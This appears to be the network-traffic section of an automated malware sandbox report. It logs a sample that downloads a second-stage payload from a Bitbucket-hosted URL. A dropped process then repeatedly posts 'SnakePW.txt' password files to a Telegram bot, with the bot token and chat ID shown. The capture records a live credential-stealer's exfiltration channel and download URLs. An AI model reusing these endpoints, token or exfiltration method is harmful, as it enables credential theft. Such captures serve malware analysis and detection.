                                                                                                                Connection: keep-alive
                                                                                                                Cache-Control: no-cache
                                                                                                                Pragma: no-cache
                                                                                                                Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 37 35 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.75</body></html>


                                                                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                0 | 192.168.2.7 | 49702 | 185.166.143.48 | 443 | 7128 | C:\Users\user\Desktop\EPTMAcgvNZ.exe
                                                                                                                Timestamp | Bytes transferred | Direction | Data
                                                                                                                2024-11-26 07:24:43 UTC | 187 | OUT | GET /ntim1478/gpmaw/downloads/240_Cobsfhiygmx HTTP/1.1
                                                                                                                Connection: Keep-Alive
                                                                                                                Accept: */*
                                                                                                                User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                                                                                                                Host: bitbucket.org
                                                                                                                2024-11-26 07:24:43 UTC | 5753 | IN | HTTP/1.1 302 Found
                                                                                                                Date: Tue, 26 Nov 2024 07:24:43 GMT
                                                                                                                Content-Type: text/html; charset=utf-8
                                                                                                                Content-Length: 0
                                                                                                                Server: AtlassianEdge
                                                                                                                Location: https://bbuseruploads.s3.amazonaws.com/e427e629-62a6-4ecd-bf22-56e4d6ea083f/downloads/d4025bf5-bb79-4526-ae33-7a2e4ade5334/240_Cobsfhiygmx?response-content-disposition=attachment%3B%20filename%3D%22240_Cobsfhiygmx%22&AWSAccessKeyId=ASIA6KOSE3BNDW6O2X3G&Signature=2chtfxoFxVQH%2B%2Bqk1LYozF4rZ%2B0%3D&x-amz-security-token=IQoJb3JpZ2luX2VjEID%2F%2F%2F%2F%2F%2F%2F%2F%2F%2FwEaCXVzLWVhc3QtMSJGMEQCIAD1NYAHfsojP08kbtMfuAOMGAEvCe3UKQ8UuqEcK7AUAiBLFY8fCNgsv5yXRVa1b5QNwmml9rALfaMKgd8jdopQyyqnAggoEAAaDDk4NDUyNTEwMTE0NiIMfAZ8Us6gNEO9lXe4KoQC4H3JCLPChoPHuNq8eVCV0VMfd0IICdqgHHTSS7ANzAU4dth3BBqgfGziNIRR91nsxqTwbAAkR9UbQFCz06yniB%2BRGncxwoJCSnWAnC0PMUZxzU%2B%2BmfP%2FabATRJ9BblkOl1DPLVzf%2FJK1O6swKVUCdmPXu9Jkpx0Zs3JpqA2SUfKf9kMOAbhud5%2B1kxcQ6T7uVBLz8q4gm46LDNyHkSdwPE%2FQPgP3oIs4bSwQ5TMxJgIO5MbAPud6%2Bz%2FVgFMzq8rBGnCYT%2F4UbUFOLOxmP7f%2FDVGr5XggPH5IbOKF9s2N5SU%2B%2B%2BFpTKfe55tJ6Uv%2BfHOKA0oQO%2BP7Wdzhn3fln1%2B7PoGjL2cwk%2BqVugY6ngGYCJOQQCMy7ggWig9zh2r3BmXcbjQcgkcKcTBPK9af%2FavWTGfdHkiCsWui9miH9txKAmMYOb08nXhpPgiwJXB [TRUNCATED]
                                                                                                                Expires: Tue, 26 Nov 2024 07:24:43 GMT
                                                                                                                Cache-Control: max-age=0, no-cache, no-store, must-revalidate, private
                                                                                                                X-Used-Mesh: False
                                                                                                                Vary: Accept-Language, Origin
                                                                                                                Content-Language: en
                                                                                                                X-View-Name: bitbucket.apps.downloads.views.download_file
                                                                                                                X-Dc-Location: Micros-3
                                                                                                                X-Served-By: e6e5cbe73c66
                                                                                                                X-Version: 0fc738d114da
                                                                                                                X-Static-Version: 0fc738d114da
                                                                                                                X-Request-Count: 1263
                                                                                                                X-Render-Time: 0.04105949401855469
                                                                                                                X-B3-Traceid: c290021cf1fc43d99e1138be62a994ab
                                                                                                                X-B3-Spanid: c9c43378a83c3f25
                                                                                                                X-Frame-Options: SAMEORIGIN
                                                                                                                Content-Security-Policy: default-src 'self' 'unsafe-inline' 'unsafe-eval' data: blob: *; base-uri 'self'; frame-ancestors 'self' start.atlassian.com start.stg.atlassian.com atlaskit.atlassian.com bitbucket.org; connect-src bitbucket.org *.bitbucket.org bb-inf.net *.bb-inf.net atlassianblog.wpengine.com id.atlassian.com api.atlassian.com api.stg.atlassian.com wss://bitbucketci-ws-service.services.atlassian.com/ wss://bitbucketci-ws-service.stg.services.atlassian.com/ wss://bitbucketci-ws-service.dev.services.atlassian.com/ analytics.atlassian.com atlassian-cookies--categories.us-east-1.prod.public.atl-paas.net as.atlassian.com api-private.stg.atlassian.com api-private.atlassian.com xp.atlassian.com atl-global.atlassian.com cofs.staging.public.atl-paas.net cofs.prod.public.atl-paas.net fd-assets.prod.atl-paas.net flight-deck-assets-bifrost.prod-east.frontend.public.atl-paas.net intake.opbeat.com api.media.atlassian.com api.segment.io xid.statuspage.io xid.atlassian.com xid.sourcetreeapp.com bam.nr-data.net bam- [TRUNCATED]
                                                                                                                X-Usage-Quota-Remaining: 999210.284
                                                                                                                X-Usage-Request-Cost: 801.87
                                                                                                                X-Usage-User-Time: 0.020435
                                                                                                                X-Usage-System-Time: 0.003621
                                                                                                                X-Usage-Input-Ops: 0
                                                                                                                X-Usage-Output-Ops: 0
                                                                                                                Age: 0
                                                                                                                X-Cache: MISS
                                                                                                                X-Content-Type-Options: nosniff
                                                                                                                X-Xss-Protection: 1; mode=block
                                                                                                                Atl-Traceid: c290021cf1fc43d99e1138be62a994ab
                                                                                                                Atl-Request-Id: c290021c-f1fc-43d9-9e11-38be62a994ab
                                                                                                                Strict-Transport-Security: max-age=63072000; includeSubDomains; preload
                                                                                                                Report-To: {"endpoints": [{"url": "https://dz8aopenkvv6s.cloudfront.net"}], "group": "endpoint-1", "include_subdomains": true, "max_age": 600}
                                                                                                                Nel: {"failure_fraction": 0.001, "include_subdomains": true, "max_age": 600, "report_to": "endpoint-1"}
                                                                                                                Server-Timing: atl-edge;dur=152,atl-edge-internal;dur=4,atl-edge-upstream;dur=150,atl-edge-pop;desc="aws-eu-central-1"
                                                                                                                Connection: close


                                                                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                1 | 192.168.2.7 | 49703 | 16.182.70.225 | 443 | 7128 | C:\Users\user\Desktop\EPTMAcgvNZ.exe
                                                                                                                Timestamp | Bytes transferred | Direction | Data
                                                                                                                2024-11-26 07:24:45 UTC | 1303 | OUT | GET /e427e629-62a6-4ecd-bf22-56e4d6ea083f/downloads/d4025bf5-bb79-4526-ae33-7a2e4ade5334/240_Cobsfhiygmx?response-content-disposition=attachment%3B%20filename%3D%22240_Cobsfhiygmx%22&AWSAccessKeyId=ASIA6KOSE3BNDW6O2X3G&Signature=2chtfxoFxVQH%2B%2Bqk1LYozF4rZ%2B0%3D&x-amz-security-token=IQoJb3JpZ2luX2VjEID%2F%2F%2F%2F%2F%2F%2F%2F%2F%2FwEaCXVzLWVhc3QtMSJGMEQCIAD1NYAHfsojP08kbtMfuAOMGAEvCe3UKQ8UuqEcK7AUAiBLFY8fCNgsv5yXRVa1b5QNwmml9rALfaMKgd8jdopQyyqnAggoEAAaDDk4NDUyNTEwMTE0NiIMfAZ8Us6gNEO9lXe4KoQC4H3JCLPChoPHuNq8eVCV0VMfd0IICdqgHHTSS7ANzAU4dth3BBqgfGziNIRR91nsxqTwbAAkR9UbQFCz06yniB%2BRGncxwoJCSnWAnC0PMUZxzU%2B%2BmfP%2FabATRJ9BblkOl1DPLVzf%2FJK1O6swKVUCdmPXu9Jkpx0Zs3JpqA2SUfKf9kMOAbhud5%2B1kxcQ6T7uVBLz8q4gm46LDNyHkSdwPE%2FQPgP3oIs4bSwQ5TMxJgIO5MbAPud6%2Bz%2FVgFMzq8rBGnCYT%2F4UbUFOLOxmP7f%2FDVGr5XggPH5IbOKF9s2N5SU%2B%2B%2BFpTKfe55tJ6Uv%2BfHOKA0oQO%2BP7Wdzhn3fln1%2B7PoGjL2cwk%2BqVugY6ngGYCJOQQCMy7ggWig9zh2r3BmXcbjQcgkcKcTBPK9af%2FavWTGfdHkiCsWui9miH9txKAmMYOb08nXhpPgiwJXBhhGW9aVZgTRRjdb2Sv%2FPIWSb4mnaUlx07x5vLgIpzF [TRUNCATED]
                                                                                                                Connection: Keep-Alive
                                                                                                                Accept: */*
                                                                                                                User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                                                                                                                Host: bbuseruploads.s3.amazonaws.com
                                                                                                                2024-11-26 07:24:46 UTC | 544 | IN | HTTP/1.1 200 OK
                                                                                                                x-amz-id-2: SY6tbCyvefy+FP58W4HPlmDrKp7NC6clrX5TRPGCBdCUxC4E/U5Iak7N2IDKhgE5iMjwJ+/tRHA=
                                                                                                                x-amz-request-id: CNQ2XMRJ6F4HXH0M
                                                                                                                Date: Tue, 26 Nov 2024 07:24:46 GMT
                                                                                                                Last-Modified: Sun, 13 Oct 2024 21:45:00 GMT
                                                                                                                ETag: "fd32db13b598ad70b971a451dbafcd53"
                                                                                                                x-amz-server-side-encryption: AES256
                                                                                                                x-amz-version-id: PjPSYxMoVKIx7__cOzoruubIprFqYDE.
                                                                                                                Content-Disposition: attachment; filename="240_Cobsfhiygmx"
                                                                                                                Accept-Ranges: bytes
                                                                                                                Content-Type: application/octet-stream
                                                                                                                Content-Length: 749280
                                                                                                                Server: AmazonS3
                                                                                                                Connection: close


                                                                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                2 | 192.168.2.7 | 49742 | 149.154.167.220 | 443 | 7240 | C:\Users\Public\Libraries\yihfsboC.pif
                                                                                                                Timestamp | Bytes transferred | Direction | Data
                                                                                                                2024-11-26 07:25:08 UTC | 358 | OUT | POST /bot6087613944:AAHG1t4ebh3cLprMu6Ghw3xp51s7PZqRKyE/sendDocument?chat_id=1802566296&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                                                                                                Content-Type: multipart/form-data; boundary=------------------------8dd0dc18a308c59
                                                                                                                Host: api.telegram.org
                                                                                                                Content-Length: 537
                                                                                                                Connection: Keep-Alive
2024-11-26 07:25:08 UTC | 537 | OUT
                                                                                                                Data Ascii: --------------------------8dd0dc18a308c59Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:899552Date and Time: 26/11/2024 / 02:24:52Client
2024-11-26 07:25:08 UTC | 388 | IN | HTTP/1.1 200 OK
                                                                                                                Server: nginx/1.18.0
                                                                                                                Date: Tue, 26 Nov 2024 07:25:08 GMT
                                                                                                                Content-Type: application/json
                                                                                                                Content-Length: 523
                                                                                                                Connection: close
                                                                                                                Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                Access-Control-Allow-Origin: *
                                                                                                                Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                                Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2024-11-26 07:25:08 UTC | 523 | IN
                                                                                                                Data Ascii: {"ok":true,"result":{"message_id":388842,"from":{"id":6087613944,"is_bot":true,"first_name":"Snakeway","username":"Snakeimportant_bot"},"chat":{"id":1802566296,"first_name":"N T","username":"Very_importnat_guy","type":"private"},"date":1732605908,"documen


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
3 | 192.168.2.7 | 49764 | 149.154.167.220 | 443 | 7660 | C:\Users\Public\Libraries\yihfsboC.pif
Timestamp | Bytes transferred | Direction | Data
2024-11-26 07:25:19 UTC | 358 | OUT | POST /bot6087613944:AAHG1t4ebh3cLprMu6Ghw3xp51s7PZqRKyE/sendDocument?chat_id=1802566296&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                                                                                                Content-Type: multipart/form-data; boundary=------------------------8dd0dc191055343
                                                                                                                Host: api.telegram.org
                                                                                                                Content-Length: 537
                                                                                                                Connection: Keep-Alive
2024-11-26 07:25:19 UTC | 537 | OUT
                                                                                                                Data Ascii: --------------------------8dd0dc191055343Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:899552Date and Time: 26/11/2024 / 02:25:04Client
2024-11-26 07:25:19 UTC | 388 | IN | HTTP/1.1 200 OK
                                                                                                                Server: nginx/1.18.0
                                                                                                                Date: Tue, 26 Nov 2024 07:25:19 GMT
                                                                                                                Content-Type: application/json
                                                                                                                Content-Length: 521
                                                                                                                Connection: close
                                                                                                                Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                Access-Control-Allow-Origin: *
                                                                                                                Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                                Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2024-11-26 07:25:19 UTC | 521 | IN
                                                                                                                Data Ascii: {"ok":true,"result":{"message_id":388844,"from":{"id":6087613944,"is_bot":true,"first_name":"Snakeway","username":"Snakeimportant_bot"},"chat":{"id":1802566296,"first_name":"N T","username":"Very_importnat_guy","type":"private"},"date":1732605919,"documen


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
4 | 192.168.2.7 | 49770 | 149.154.167.220 | 443 | 7240 | C:\Users\Public\Libraries\yihfsboC.pif
Timestamp | Bytes transferred | Direction | Data
2024-11-26 07:25:20 UTC | 334 | OUT | POST /bot6087613944:AAHG1t4ebh3cLprMu6Ghw3xp51s7PZqRKyE/sendDocument?chat_id=1802566296&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                                                                                                Content-Type: multipart/form-data; boundary=------------------------8dd0dc19698755d
                                                                                                                Host: api.telegram.org
                                                                                                                Content-Length: 537
2024-11-26 07:25:20 UTC | 537 | OUT
                                                                                                                Data Ascii: --------------------------8dd0dc19698755dContent-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:899552Date and Time: 26/11/2024 / 02:24:52Client
2024-11-26 07:25:21 UTC | 388 | IN | HTTP/1.1 200 OK
                                                                                                                Server: nginx/1.18.0
                                                                                                                Date: Tue, 26 Nov 2024 07:25:20 GMT
                                                                                                                Content-Type: application/json
                                                                                                                Content-Length: 521
                                                                                                                Connection: close
                                                                                                                Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                Access-Control-Allow-Origin: *
                                                                                                                Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                                Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2024-11-26 07:25:21 UTC | 521 | IN
                                                                                                                Data Ascii: {"ok":true,"result":{"message_id":388846,"from":{"id":6087613944,"is_bot":true,"first_name":"Snakeway","username":"Snakeimportant_bot"},"chat":{"id":1802566296,"first_name":"N T","username":"Very_importnat_guy","type":"private"},"date":1732605920,"documen


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
5 | 192.168.2.7 | 49775 | 149.154.167.220 | 443 | 7240 | C:\Users\Public\Libraries\yihfsboC.pif
Timestamp | Bytes transferred | Direction | Data
2024-11-26 07:25:22 UTC | 334 | OUT | POST /bot6087613944:AAHG1t4ebh3cLprMu6Ghw3xp51s7PZqRKyE/sendDocument?chat_id=1802566296&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                                                                                                Content-Type: multipart/form-data; boundary=------------------------8dd0dd94d3b31f7
                                                                                                                Host: api.telegram.org
                                                                                                                Content-Length: 537
2024-11-26 07:25:22 UTC | 537 | OUT
                                                                                                                Data Ascii: --------------------------8dd0dd94d3b31f7Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:899552Date and Time: 26/11/2024 / 02:24:52Client
2024-11-26 07:25:23 UTC | 388 | IN | HTTP/1.1 200 OK
                                                                                                                Server: nginx/1.18.0
                                                                                                                Date: Tue, 26 Nov 2024 07:25:22 GMT
                                                                                                                Content-Type: application/json
                                                                                                                Content-Length: 521
                                                                                                                Connection: close
                                                                                                                Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                Access-Control-Allow-Origin: *
                                                                                                                Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                                Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2024-11-26 07:25:23 UTC | 521 | IN
                                                                                                                Data Ascii: {"ok":true,"result":{"message_id":388848,"from":{"id":6087613944,"is_bot":true,"first_name":"Snakeway","username":"Snakeimportant_bot"},"chat":{"id":1802566296,"first_name":"N T","username":"Very_importnat_guy","type":"private"},"date":1732605922,"documen


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
6 | 192.168.2.7 | 49776 | 149.154.167.220 | 443 | 7924 | C:\Users\Public\Libraries\yihfsboC.pif
Timestamp | Bytes transferred | Direction | Data
2024-11-26 07:25:23 UTC | 358 | OUT | POST /bot6087613944:AAHG1t4ebh3cLprMu6Ghw3xp51s7PZqRKyE/sendDocument?chat_id=1802566296&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                                                                                                Content-Type: multipart/form-data; boundary=------------------------8dd0dcf44be8900
                                                                                                                Host: api.telegram.org
                                                                                                                Content-Length: 537
                                                                                                                Connection: Keep-Alive
2024-11-26 07:25:23 UTC | 537 | OUT
                                                                                                                Data Ascii: --------------------------8dd0dcf44be8900Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:899552Date and Time: 26/11/2024 / 04:03:12Client
2024-11-26 07:25:23 UTC | 388 | IN | HTTP/1.1 200 OK
                                                                                                                Server: nginx/1.18.0
                                                                                                                Date: Tue, 26 Nov 2024 07:25:23 GMT
                                                                                                                Content-Type: application/json
                                                                                                                Content-Length: 521
                                                                                                                Connection: close
                                                                                                                Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                Access-Control-Allow-Origin: *
                                                                                                                Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                                Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2024-11-26 07:25:23 UTC | 521 | IN
                                                                                                                Data Ascii: {"ok":true,"result":{"message_id":388850,"from":{"id":6087613944,"is_bot":true,"first_name":"Snakeway","username":"Snakeimportant_bot"},"chat":{"id":1802566296,"first_name":"N T","username":"Very_importnat_guy","type":"private"},"date":1732605923,"documen


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
7 | 192.168.2.7 | 49781 | 149.154.167.220 | 443 | 7240 | C:\Users\Public\Libraries\yihfsboC.pif
Timestamp | Bytes transferred | Direction | Data
2024-11-26 07:25:24 UTC | 334 | OUT | POST /bot6087613944:AAHG1t4ebh3cLprMu6Ghw3xp51s7PZqRKyE/sendDocument?chat_id=1802566296&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                                                                                                Content-Type: multipart/form-data; boundary=------------------------8dd0df0efc49c34
                                                                                                                Host: api.telegram.org
                                                                                                                Content-Length: 537
2024-11-26 07:25:24 UTC | 537 | OUT
                                                                                                                Data Ascii: --------------------------8dd0df0efc49c34Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:899552Date and Time: 26/11/2024 / 02:24:52Client
2024-11-26 07:25:26 UTC | 388 | IN | HTTP/1.1 200 OK
                                                                                                                Server: nginx/1.18.0
                                                                                                                Date: Tue, 26 Nov 2024 07:25:25 GMT
                                                                                                                Content-Type: application/json
                                                                                                                Content-Length: 521
                                                                                                                Connection: close
                                                                                                                Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                Access-Control-Allow-Origin: *
                                                                                                                Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                                Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2024-11-26 07:25:26 UTC | 521 | IN
                                                                                                                Data Ascii: {"ok":true,"result":{"message_id":388852,"from":{"id":6087613944,"is_bot":true,"first_name":"Snakeway","username":"Snakeimportant_bot"},"chat":{"id":1802566296,"first_name":"N T","username":"Very_importnat_guy","type":"private"},"date":1732605925,"documen


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
8 | 192.168.2.7 | 49786 | 149.154.167.220 | 443 | 7240 | C:\Users\Public\Libraries\yihfsboC.pif
Timestamp | Bytes transferred | Direction | Data
2024-11-26 07:25:27 UTC | 334 | OUT | POST /bot6087613944:AAHG1t4ebh3cLprMu6Ghw3xp51s7PZqRKyE/sendDocument?chat_id=1802566296&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                                                                                                Content-Type: multipart/form-data; boundary=------------------------8dd0e138cddbc0c
                                                                                                                Host: api.telegram.org
                                                                                                                Content-Length: 537
2024-11-26 07:25:27 UTC | 537 | OUT | Data Ascii: --------------------------8dd0e138cddbc0cContent-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:899552Date and Time: 26/11/2024 / 02:24:52Client
2024-11-26 07:25:28 UTC | 388 | IN | HTTP/1.1 200 OK
                                                                                                                Server: nginx/1.18.0
                                                                                                                Date: Tue, 26 Nov 2024 07:25:27 GMT
                                                                                                                Content-Type: application/json
                                                                                                                Content-Length: 521
                                                                                                                Connection: close
                                                                                                                Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                Access-Control-Allow-Origin: *
                                                                                                                Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                                Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2024-11-26 07:25:28 UTC | 521 | IN | Data Ascii: {"ok":true,"result":{"message_id":388854,"from":{"id":6087613944,"is_bot":true,"first_name":"Snakeway","username":"Snakeimportant_bot"},"chat":{"id":1802566296,"first_name":"N T","username":"Very_importnat_guy","type":"private"},"date":1732605927,"documen


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
9 | 192.168.2.7 | 49791 | 149.154.167.220 | 443 | 7240 | C:\Users\Public\Libraries\yihfsboC.pif
Timestamp | Bytes transferred | Direction | Data
2024-11-26 07:25:29 UTC | 334 | OUT | POST /bot6087613944:AAHG1t4ebh3cLprMu6Ghw3xp51s7PZqRKyE/sendDocument?chat_id=1802566296&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                                                                                                Content-Type: multipart/form-data; boundary=------------------------8dd0e2afe1517dc
                                                                                                                Host: api.telegram.org
                                                                                                                Content-Length: 537
2024-11-26 07:25:29 UTC | 537 | OUT | Data Ascii: --------------------------8dd0e2afe1517dcContent-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:899552Date and Time: 26/11/2024 / 02:24:52Client
2024-11-26 07:25:32 UTC | 388 | IN | HTTP/1.1 200 OK
                                                                                                                Server: nginx/1.18.0
                                                                                                                Date: Tue, 26 Nov 2024 07:25:32 GMT
                                                                                                                Content-Type: application/json
                                                                                                                Content-Length: 521
                                                                                                                Connection: close
                                                                                                                Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                Access-Control-Allow-Origin: *
                                                                                                                Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                                Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2024-11-26 07:25:32 UTC | 521 | IN | Data Ascii: {"ok":true,"result":{"message_id":388856,"from":{"id":6087613944,"is_bot":true,"first_name":"Snakeway","username":"Snakeimportant_bot"},"chat":{"id":1802566296,"first_name":"N T","username":"Very_importnat_guy","type":"private"},"date":1732605932,"documen


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
10 | 192.168.2.7 | 49793 | 149.154.167.220 | 443 | 7660 | C:\Users\Public\Libraries\yihfsboC.pif
Timestamp | Bytes transferred | Direction | Data
2024-11-26 07:25:30 UTC | 334 | OUT | POST /bot6087613944:AAHG1t4ebh3cLprMu6Ghw3xp51s7PZqRKyE/sendDocument?chat_id=1802566296&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                                                                                                Content-Type: multipart/form-data; boundary=------------------------8dd0dc19c90c343
                                                                                                                Host: api.telegram.org
                                                                                                                Content-Length: 537
2024-11-26 07:25:30 UTC | 537 | OUT | Data Ascii: --------------------------8dd0dc19c90c343Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:899552Date and Time: 26/11/2024 / 02:25:04Client
2024-11-26 07:25:32 UTC | 388 | IN | HTTP/1.1 200 OK
                                                                                                                Server: nginx/1.18.0
                                                                                                                Date: Tue, 26 Nov 2024 07:25:32 GMT
                                                                                                                Content-Type: application/json
                                                                                                                Content-Length: 521
                                                                                                                Connection: close
                                                                                                                Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                Access-Control-Allow-Origin: *
                                                                                                                Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                                Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2024-11-26 07:25:32 UTC | 521 | IN | Data Ascii: {"ok":true,"result":{"message_id":388857,"from":{"id":6087613944,"is_bot":true,"first_name":"Snakeway","username":"Snakeimportant_bot"},"chat":{"id":1802566296,"first_name":"N T","username":"Very_importnat_guy","type":"private"},"date":1732605932,"documen


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
11 | 192.168.2.7 | 49803 | 149.154.167.220 | 443 | 7660 | C:\Users\Public\Libraries\yihfsboC.pif
Timestamp | Bytes transferred | Direction | Data
2024-11-26 07:25:34 UTC | 334 | OUT | POST /bot6087613944:AAHG1t4ebh3cLprMu6Ghw3xp51s7PZqRKyE/sendDocument?chat_id=1802566296&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                                                                                                Content-Type: multipart/form-data; boundary=------------------------8dd0de89fac7a38
                                                                                                                Host: api.telegram.org
                                                                                                                Content-Length: 537
2024-11-26 07:25:34 UTC | 537 | OUT | Data Ascii: --------------------------8dd0de89fac7a38Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:899552Date and Time: 26/11/2024 / 02:25:04Client
2024-11-26 07:25:34 UTC | 388 | IN | HTTP/1.1 200 OK
                                                                                                                Server: nginx/1.18.0
                                                                                                                Date: Tue, 26 Nov 2024 07:25:34 GMT
                                                                                                                Content-Type: application/json
                                                                                                                Content-Length: 521
                                                                                                                Connection: close
                                                                                                                Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                Access-Control-Allow-Origin: *
                                                                                                                Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                                Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2024-11-26 07:25:34 UTC | 521 | IN | Data Ascii: {"ok":true,"result":{"message_id":388860,"from":{"id":6087613944,"is_bot":true,"first_name":"Snakeway","username":"Snakeimportant_bot"},"chat":{"id":1802566296,"first_name":"N T","username":"Very_importnat_guy","type":"private"},"date":1732605934,"documen


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
12 | 192.168.2.7 | 49802 | 149.154.167.220 | 443 | 7240 | C:\Users\Public\Libraries\yihfsboC.pif
Timestamp | Bytes transferred | Direction | Data
2024-11-26 07:25:34 UTC | 334 | OUT | POST /bot6087613944:AAHG1t4ebh3cLprMu6Ghw3xp51s7PZqRKyE/sendDocument?chat_id=1802566296&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                                                                                                Content-Type: multipart/form-data; boundary=------------------------8dd0e5dbbcfced3
                                                                                                                Host: api.telegram.org
                                                                                                                Content-Length: 537
2024-11-26 07:25:34 UTC | 537 | OUT | Data Ascii: --------------------------8dd0e5dbbcfced3Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:899552Date and Time: 26/11/2024 / 02:24:52Client
2024-11-26 07:25:34 UTC | 388 | IN | HTTP/1.1 200 OK
                                                                                                                Server: nginx/1.18.0
                                                                                                                Date: Tue, 26 Nov 2024 07:25:34 GMT
                                                                                                                Content-Type: application/json
                                                                                                                Content-Length: 521
                                                                                                                Connection: close
                                                                                                                Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                Access-Control-Allow-Origin: *
                                                                                                                Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                                Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
